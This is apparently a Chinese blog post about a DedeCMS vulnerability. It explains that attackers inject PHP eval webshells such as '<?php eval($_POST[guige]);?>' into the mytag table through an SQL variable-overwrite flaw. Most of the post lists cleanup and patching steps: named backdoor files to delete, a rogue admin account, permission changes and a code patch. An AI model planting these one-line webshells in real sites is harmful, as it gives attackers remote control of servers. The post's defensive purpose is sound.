1.先說說是什么木馬或者掛木馬的大鳥的方法(個人研究大概覺得吧)
內容分別為:<?php eval($_POST[guige]);?>��,<?php eval($_POST[fuwu]);?> 應該是鬼哥這位大鳥發(fā)現漏洞的吧��。
方法就是利用sql方法getshell,使得sql增加表mytag的內容
原因: 用的語句是update很多站 mytag 里面都沒內容����。那么你用update 那有什么用 修改不了任何數據��。只能用 INSERT 當然,語句帶#就會暴錯誤�����?����!,F在要做的饒過即可.
至于手段,我就不明說了。
2.重點是如何來解決或者防患于未然�����。
(1)首先檢查根目錄是否有asdd.php 文件如果有 就刪除
(2)刪除plus下的90sec.php,service.php��,vliw.php��,vuew.php�����,digg.php,xiao.php��,bakup.php等可疑文件��。
(3)查看download.php����,mytag_js.php文件最近修改日期����,如果是最新時間,那么進去修改把掛的黑鏈都刪除��。
(4)如果遇到織夢程序后臺plus/90sec.php的文件����,得每天刪除����,可是刪除了,第二天就又出現了,那么主要操作是(后臺->模板->自定義宏標記中刪除其中的條目����,并且修復include/dedesql.class.php文件)———-這步重要
(5) 給plus合理的權限��,數據化表現是555權限 通過ftp 如下圖,通過代碼如chmod -R 555 xxxx.com/plus
(6)刪除data/cache/mytag-9013.htm 這種類型的所有htm文件,刪除tplcache的緩存文件�����。發(fā)現的越來越多了
(7)如果后天多出來一個管理員����,那么刪除增加的管理員:service
(8)數據庫要清空dede_mytag表
(9)臨時補丁:不知道別的地方還有沒有覆蓋變量 反正這個漏洞是修復的——————————————-重點找到include/dedesql.class.php–注釋那句話
if(isset($GLOBALS['arrs1']))
-
{
-
$v1 = $v2 = ”;
-
for($i=0;isset($arrs1[$i]);$i++)
{
$v1 .= chr($arrs1[$i]);
}
for($i=0;isset($arrs2[$i]);$i++)
{
// $v2 .= chr($arrs2[$i]);//注釋這里
}
$GLOBALS[$v1] .= $v2;
}
(10)用織夢漏洞檢測修復工具-重新檢測以前存在的漏洞。(附件免費下載–使用前還是備份數據庫以防誤殺)
